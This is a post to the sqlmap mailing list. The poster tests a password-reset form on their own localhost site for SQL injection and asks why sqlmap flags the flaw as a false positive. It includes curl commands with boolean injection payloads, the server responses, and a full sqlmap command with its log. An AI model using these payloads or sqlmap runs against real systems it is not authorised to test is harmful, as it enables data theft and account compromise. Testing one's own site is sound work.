Ok so I know that my site has an sqli (and boolean/mysql time based). I even tried both of them myself and the results are very clear and simple, yet sqlmap doesn't seem to see it. It can find the time based at first, but it always ends up saying that it's a false positive.
cURL will give me the following result from the page, using "and boolean based sqli" with a true statement: curl --data "lostpass=1'%20OR 1=1 AND 1='1" http://localhost/account/index.php <div class='message' style='padding:10px;'>Your password was e-mailed to 1' OR 1='1</div> And now a false one curl --data "lostpass=1' OR 1=1 AND 1='2" http://localhost/account/index.php <td class='message'>The email address you entered 1' OR 1=1 AND 1='2 does not exist</p> I have tried with --string and --text-only with sqlmap, but I get the same results over and over. Here's some sample output: python sqlmap.py -u "http://localhost/account/index.php"; --random-agent --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" --text-only --delay=5 --technique=TB [16:57:34] [INFO] testing connection to the target url [16:57:49] [INFO] heuristics detected web page charset 'ascii' [16:57:50] [INFO] testing if the provided string is within the target URL page content [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic [16:58:13] [INFO] POST parameter 'lostpass' is dynamic [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' might not be injectable [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass' [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND time-based blind' injectable [17:00:48] [INFO] checking if the injection point on POST parameter 'lostpass' is a false positive [17:03:09] [WARNING] false positive injection point detected [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable [17:03:09] [CRITICAL] all parameters appear to be not injectable. I tried with a sleep(5) injection manually as well, and it works like a charm. Any ideas? ------------------------------------------------------------------------------ Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex infrastructure or vast IT resources to deliver seamless, secure access to virtual desktops. With this all-in-one solution, easily deploy virtual desktops for less than the cost of PCs and save 60% on VDI infrastructure costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
